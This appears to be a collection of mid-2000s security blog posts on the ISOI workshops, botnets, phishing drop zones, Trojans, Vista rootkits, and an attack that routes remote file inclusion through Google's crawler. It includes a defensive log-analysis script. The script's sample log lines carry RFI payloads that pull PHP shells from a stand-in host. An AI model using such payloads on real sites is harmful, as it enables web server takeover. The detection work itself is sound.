ISOI 3 is on, and Washington DC is hot

following up on that strange title, isoi 3 (internet security operations and intelligence), a workshop for do-ers who work on the security of the internet and its users, is happening monday and tuesday in washington, dc.

this time around we have even more government participation (we’re in dc, duh), but a bit less from academia (who can look at long-term solutions), to complement us security researchers and the operators (who respond to, contain and mitigate incidents).

i am very pleased with our progress on encouraging global cooperation, and on getting more industry information sharing going. i am also happy we are moving from “just” good-will based relationships to the physical world with our efforts, being able to take things to the next level with world-wide operational task forces and, indeed, effecting change.

if you are interested in this realm of internet security operations, take a look at isoi 3’s schedule, and perhaps submit something for the next workshop.

some reporters are somewhat annoyed that entrance is barred to them, but i hope they understand that although we make things public whenever we can, as full disclosure is a strong weapon in the fight against cyber crime, folks can not share as openly when they have to be on their toes all the time.

the third isoi is happening because, after dhs ended up unable to host it, sponsors emerged who were happy to assist:

afilias ltd.:
the internet society:
shinkuro, inc.:

it’s going to be an interesting next week here at the swamp. attendees had better show up with their two forms of id. :)

gadi evron,


CFP: ISOI III (a DA workshop)

cfp information and current speakers below.

isoi 3 (internet security operations and intelligence) will be held in
washington dc this august, on the 27th and 28th.

this time around the folks at us-cert (department of homeland security -
dhs) are hosting. sunbelt software is running the after-party dinner.

we only have a partial agenda at this time (see below), but to remind you of what you will see, here are the previous ones:

if you haven’t rsvp’d yet, please do so soon. although we have 240 seats, we are running out of space.

a web page for isoi 3 can be found at:

27th, 28th august, 2007
washington dc -
aed conference center:

registration via is mandatory, at no cost to attendees. check on our web page whether you qualify for a seat.


this is the official cfp for isoi 3. main subjects include: fastflux, fraud, ddos, botnets. other subjects relating to internet security operations are also welcome.

some of our current speakers, as you can see below, lecture on anything from estonia’s “war” to current web 2.0 threats in the wild.

please email as soon as possible to submit a proposal. i will gather the proposals and pass them to our committee (jeff moss) for review.

current speakers (before committee decision)

roger thompson (exp labs)
- google adwords... the dangers of dealing with the russian mafia

barry raveendran greene (cisco)
- what you should be asking me as a routing vendor

john lacour (mark monitor)
- vulnerabilities used to hack sites for phishing
- using xss to track phishers

dan hubbard (websense)
- mpack and honeyjax (web 2.0 honeypots)

april lorenzen
- fastflux: operational update

william salusky (aol)
- the spammer evolves – migration to webmail

hillar aarelaid (estonian cert)
- incident response during the recent attack

Sun Shine (beyond security)
- strategic lessons from the estonian “first internet war”

jose nazario (arbor)
- botnet statistics from the estonian attack

andrew fried (treasury department)
- phishing and the irs – new methods

danny mcpherson (arbor)
- tba


Malware went commercial

In a Washington Post piece, Brian Krebs describes how malware authors have started spending cash on sponsored links for high-profile keywords, ones that are regularly searched for by people with poorly patched machines, so that they can infect those visitors with malware.

One such high-profile keyword is the BBB, the Better Business Bureau, which, as you would guess, most average joes will search for and visit; buying a keyword like Slashdot won’t reach that audience :) .

This is of course an interesting move, though not an unexpected one. I can see a “legit company” coming soon, where a malware distribution outfit is organized like any other business: R&D (create new malware and find new vulnerabilities), Marketing (buy high-profile keywords, or otherwise draw people to your malware-infected web site) and Sales (sell botnets and infected/hacked computers for money).


Gozi Trojan analysis

SecureWorks has posted an analysis of another Trojan, this one used to steal SSL/TLS-encrypted data transferred from the victim’s PC.

A single attack by a single variant compromised more than 5,200 hosts and 10,000 user accounts on hundreds of sites.

  • Steals SSL data using advanced Winsock2 functionality
  • State-of-the-art, modularized Trojan code
  • Spread through IE browser exploits
  • Undetected for weeks, months by many AV vendors
  • Customized server/database code to collect sensitive data
  • Customer interface for on-line purchases of stolen data
  • Accounts compromised by stealing data primarily from infected home PCs
  • Accounts at top financial, retail, health care, and government services affected
  • Data’s black market value at least $2 million

Full article is here.


MS OneCare last in anti-virus tests – what’s the future

Austrian AV Comparatives Web site tested 17 AV products – including several free anti-virus programs as well.
Link to the test:
(select ‘Comparatives’ and ‘On-demand comparative / February 2007′)

Microsoft’s Live OneCare was the only product scoring below the ‘Standard’ level: it detected only 82.4 percent of the malware. Many well-known vendors scored 97.9 percent, and the winner scored 99.5 percent.
OneCare’s detection of polymorphic viruses was poor as well, says the report.

This is not the only coverage test published, but AV Comparatives will release more similar tests later this year. We will see if the result will change.


Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]


the newly formed web honeynet project from securiteam and the isotf will, in the next few months, announce research on real-world web server attacks which infect web servers with tools, connect-back shells, bots, downloaders, malware, etc., all of which are cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos into attack platforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells have been known for a while, as have file inclusion (or rfi) attacks; however, they were mostly treated as something secondary, and not much attention (if any, save for some blogs and a few mailing list posts a year ago) was given to the subject beyond the vulnerabilities themselves.

the bad guys currently exploit, build botnets and deface on a massive scale, forcing isps and colos to combat an impossible situation where a (mainly) php application belonging to any single user can expose an entire server farm, and where the web vulnerability serves either as a direct remote code execution or as a remote foothold to be followed by a local code execution exploit.

what is new here is the scale, and the fact that we now start engaging the bad guys on this front (on which, so far, they have been unchallenged). meaning, aside from research, the web honeynet project will also release actionable data on offensive ip addresses, urls and the tools themselves, made available to operational folks so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets years ago. several folks (and, quite loudly, me) have been warning about this for a while; now it’s time to take action instead of talk. :)

note: below you can find sample statistics from the web honeynet project for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public in the february edition of virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( ).

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), ...
 | 12 | http://m (4), http://m (6), http://m (2)
 | 11 | http://w


Drop zones and an intelligence war

in this post ( ), fx describes a drop zone for a phishing/banking trojan horse, and how he got to it.

go fx. i will refrain from commenting on the report he describes from secure science, which i guess is a comment on its own.

we had the same thing happen twice before in 2006 (that is worth mentioning or can be, in public).

the first time, with a very large “security intelligence” company giving out drop zone data in a marketing attempt to get more bank clients (“hey buddy, why are 400 banks surfing to our drop zone?!?!”).

the second time, with a guy at defcon showing a live drop zone, and the data analysis for it, and asking for it to be taken down (it wasn’t, until a week later during the same lecture at the first isoi workshop hosted by cisco). in this guy’s defense though, he was sharing information. at a time when nearly no one was aware of drop zones, even though they had been around for years, he openly shared data which was commercially valuable, and allowed others to clue up on the threats.

did anyone ever consider that this is an intelligence source, and that a take-down is not exactly the smartest move?

it’s bad enough that the good guys all fight over the same information, and that even the most experienced security professionals make mistakes that cost millions of usd daily; but publishing drop zone ips publicly? that can only result in a lost intelligence source, and in the next one being, say, not so available.

i believe in public information and in the harm of over-secrecy; i am, however, a very strong believer that some things are secret for a reason. what can we expect though, when the security industry is 3 years behind and we in the industry are all a bunch of self-taught amateurs having fun with our latest discoveries?

at least we have responsible folks like fx around to take care of things when others screw up.

i got tired of being the bad guy calling “the king is naked”, at least in this case we can blame fx. :)

it’s an intelligence war people, and it is high time we got our act together.

i will raise this subject at the next isoi workshop hosted by microsoft
( ) and see what bright ideas we come up with.

gadi evron,


Botnets: a retrospective to 2006, and where we are headed in 2007

a few months back i released a post on where i think anti-botnet technology is heading. now it’s time for what happened in 2006, and what we can expect from here on.

i am not a believer in such retrospective looks, as often they are completely biased, based on what we have seen and what we want to see. this is why i will try to limit myself to what we know happens and is likely to get attention, as well as what we have seen the bad guys try, which works well enough for them to take to the next level.

what changed with botnets in 2006:

1. botnets reached a level where it is unclear today what parts of the internet are not compromised to some extent. count by clean rather than by infected.
2. botnets have become the most significant platform from which virtually any type of online attack and crime is launched. botnets equal an online infrastructure for abusive or criminal activity.
3. in the past year, botnets have become mainstream. from a non-existent field, even in the professional realm, up to a few years ago (while attacks were happening constantly regardless), it has turned into the main buzzword and occupation of the security industry today, directly and indirectly.
4. websites have returned to being one of the most significant forms of infection for building botnets, which hadn’t been the case since the late 90s.
5. botnets have become the moving force behind organized crime online, with a low-risk, high-profit calculation.
6. new technologies are finally being introduced, moving the botnet controllers from using just (or mainly) irc to more advanced c&c (command and control) channels such as p2p, or multi-layered ones, such as dns and irc at different layers of the osi model.
7. botnets used to be a game of quantity. today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in the type of bot and in its abilities.

what’s going to happen with botnets in 2007:

botnets won’t change; all will remain as it has been for years. awareness, however, will increase, making the problem appear larger and larger, perhaps approaching its real scale. the bad guys will utilize their infrastructure to get more out of the bots (quality, once quantity is here) and be able to do more than just steal cash, maximizing their revenue.

further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering to shameless and open shows of strength against those who oppose them (think blue security), in the real world as well as the cyber one (which to the mob are one and the same; it’s the income that speaks).

meaning, the existing botnet infrastructure will be utilized both openly, since online miscreants (the real-world mob) face virtually no risk, and quietly and secretively, for third-party intelligence operations.

gadi evron,


Internet Security Operations and Intelligence II

isoi 2 is finalized. the schedule and agenda can be found here:

i am going to do my best to release some of these presentations publicly after the event (if the authors agree), but it is not likely.

some public feedback will be relayed from the workshop.

gadi evron,


Anonymizing RFI Attacks Through Google

google can be used to hack into websites by actively exploiting them, as opposed to the information gathering of “google hacking” (although that is how most of the sites vulnerable to rfi attacks are found).

if you place a url on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites by routing them through google’s crawler.

poc -
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.

example url:

google harvests this url, visits it with its crawler and indexes it.
in doing so it requests the target site with the url it was given, unwittingly exploiting the target on behalf of whoever planted the url. it’s a feature, not a bug.

this is currently exploited in the wild. for example, try searching google for:

and note, as an example:
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.

why use a botnet when one can abuse the google crawler, which is allowed on most web sites?

1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why other attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.

noam rathaus.
(with thanks to Sun Shine and lev toger)
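as an added example, not code from the web honeynet task force or from the post above, the following python script does the defender’s side of both the honeynet report and the crawler-anonymized rfi attack: it pulls remote file inclusion attempts out of web server access logs (a query parameter whose value is a remote url, with the trailing “?” or %00 the attacker appends to neutralize the local suffix), aggregates them into the same “ip | hit count | malware (count)” shape as the sample report, and marks attempts whose user agent is a search engine crawler, which is what a google-anonymized rfi attack looks like in the target’s log. the log lines, ip addresses and payload hosts are constructed for the example.

```python
"""Find remote file inclusion (RFI) attempts in Apache "combined" access logs,
aggregate them per source ip like the web honeynet report, and flag attempts
that arrived through a search engine crawler.  Added example; the log lines
below are constructed, the hosts and ips in them are made up."""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# ip ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# user agents of the crawlers an attacker could route a planted url through
CRAWLER_UA_RE = re.compile(r"googlebot|bingbot|yahoo! slurp|msnbot", re.I)


def included_urls(path):
    """Return every query-string value that points at a remote resource.

    ?page=http://evil/r57.txt?  is the classic shape: the trailing '?' (or a
    %00 null byte) turns whatever the application appends (".php", "/index.php")
    into a harmless query string or truncates it.  Both are stripped so the same
    payload url counts once."""
    found = []
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            found.append(value.split("\x00", 1)[0].rstrip("?"))
    return found


def find_rfi(lines):
    """Yield (source_ip, included_url, via_crawler) for every RFI attempt."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        for url in included_urls(rec["path"]):
            yield rec["ip"], url, bool(CRAWLER_UA_RE.search(rec["ua"]))


def summarize(lines):
    """Return {ip: (hit_count, Counter(url -> count), crawler_hit_count)}."""
    hits, crawler = Counter(), Counter()
    urls = defaultdict(Counter)
    for ip, url, via_crawler in find_rfi(lines):
        hits[ip] += 1
        urls[ip][url] += 1
        if via_crawler:
            crawler[ip] += 1
    return {ip: (hits[ip], urls[ip], crawler[ip]) for ip in hits}


def format_report(summary):
    """Render the 'ip | hit count | malware (count), ...' table from the post,
    busiest source first, plus how many of its hits came via a crawler."""
    rows = ["ip | hit count | malware (count), ... | via crawler"]
    for ip, (n, url_counts, crawler_n) in sorted(summary.items(), key=lambda kv: -kv[1][0]):
        listing = ", ".join(f"{u} ({c})" for u, c in url_counts.most_common())
        rows.append(f"{ip} | {n} | {listing} | {crawler_n}")
    return "\n".join(rows)


# constructed sample: one scanner, one attempt bounced through a crawler, one normal request
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2007:03:12:01 +0000] "GET /index.php?page=http://198.51.100.9/r57.txt? HTTP/1.1" 200 4096 "-" "libwww-perl/5.805"
203.0.113.7 - - [10/Jan/2007:03:12:02 +0000] "GET /admin/main.php?inc=http://198.51.100.9/r57.txt? HTTP/1.1" 200 4096 "-" "libwww-perl/5.805"
203.0.113.7 - - [10/Jan/2007:03:12:03 +0000] "GET /index.php?page=http://198.51.100.9/c99.txt%00 HTTP/1.1" 200 4096 "-" "libwww-perl/5.805"
192.0.2.10 - - [10/Jan/2007:04:00:10 +0000] "GET /index.php?page=http://198.51.100.9/r57.txt? HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.44 - - [10/Jan/2007:04:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://www.example.com/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print(format_report(summarize(SAMPLE_LOG.splitlines())))
```

a crawler hit is only a hint: the user agent string is attacker-controlled, so before treating a source as google rather than as a scanner pretending to be google, confirm the ip by reverse and forward dns. the useful outcome in either case is the same as in the post: the included url, not the requesting ip, is the thing to block and report, since that is where the shell is hosted.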


Real life uses for vulnerabilities: [funsec] Haxdoor: UK Police Count 8,500 Victims in Data Theft (So Far)

as can be seen in the quoted message below –

so, here we go. real-life uses for vulnerabilities.

below is an example of just one “drop-zone” server in the united states, which has “600 financial companies and banks”.

several gigs of data.

how do these things work?


More on Joanna Rutkowska Blue Pill and the New Vista

so, blue pill no longer works on vista. well, that’s too bad. after talking to a few friends of mine, i decided writing a bit more about this.

the main question following this news is: does that mean we are now secure?

the answer, plain and simple, is no.


1. there are other rootkit and trojan horse technologies.
2. this did not solve the problem, it just made sure a driver would have to be loaded to make it work. as a rootkit is being installed, i don’t see this as much of a set-back.

what it is a set-back for is legitimate software development. take a hex editor as an example: the developers would now have to create a driver specifically for this purpose. i can see how this can become an issue for a lot of the software out there which needs raw access to the disk. from user mode, it now can’t.

a driver will be written and released for bad guys to use with their backdoor tools.

to quote joanna on this issue, from the same blog:

imagine a company wanting to release e.g. a disk editor. now, with the blocked write access to raw disk sectors from usermode, the company would have to provide their own custom, but 100% legal, kernel driver for allowing their, again 100% legal, application (disk editor), to access those disk sectors, right? of course, the disk editor’s auxiliary driver would have to be signed – after all it’s a legal driver, designed for legal purposes and ideally having neither implementation nor design bugs! but, on the other hand, there is nothing which could stop an attacker from “borrowing” such a signed driver and using it to perform the pagefile attack. the point here is, again, there is no bug in the driver, so there is no reason for revoking a signature of the driver. even if we discovered that such driver is actually used by some people to conduct the attack!

but it seems that ms actually decided to ignore those suggestions and implemented the easiest solution, ignoring the fact that it really doesn’t solve the problem…

gadi evron,


Joanna Rutkowska’s blue pill and Vista RC2

joanna just published a blog entry on this issue, and how her poc doesn’t work on the new vista release.

why, etc.

“it quickly turned out that our exploit doesn’t work anymore! the
reason: vista rc2 now blocks write-access to raw disk sectors for user
mode applications, even if they are executed with elevated administrative


(hat tip to elad efrat)


setSlice() exploitation in the wild – MASSIVE

exploit code is available:

sans diary:

and this is so massively exploited, it makes vml look cute. there’s a rootkit, some other malware, and haxdoor! (a phishing trojan horse)

thanks to roger thompson at for first reporting it.


Identities Lost in Phishing

i just opened this discussion on the phishing mailing list. you are all invited to join in.

as i often comment, it is funny to me (not really but hold on) when people scream about this or that organization losing a laptop with 20k identities. what’s 20k?

obviously that is important, and speaks volumes of corporate security and of privacy issues. still, it is insignificant in a laughable fashion when compared to what’s being stolen daily online.

every day, millions of online identities and website credentials are lost. millions. every day.


Nifty social engineering

Hi folks,

This is an example of nifty social engineering, which is really quite funny… _unless_ you’re the one on the receiving end. Here’s how it works….

You’re surfing the web, and you find a video that you really want to watch, (no, not one of “those” videos… well, not necessarily anyway), but it says you have to install a codec. Codec stands for compressor/ decompressor and is used to make otherwise huge video files into a more manageable size. You install the codec, and maybe you see the video, and maybe you don’t, but guess what? You’ve been rootkitted! Now, on one level, that’s just the classic bait and switch/ trojan horse scenario, but the _details_ are quite interesting.

I was looking at just such an example today, and I was wondering, suspiciously, why people would give a codec away for free, so I went to the codec website, started looking around, and found, of all things…. a EULA. In the EULA we find that, despite all the references to needing a codec for Windows Media Player, there’s the following paragraph….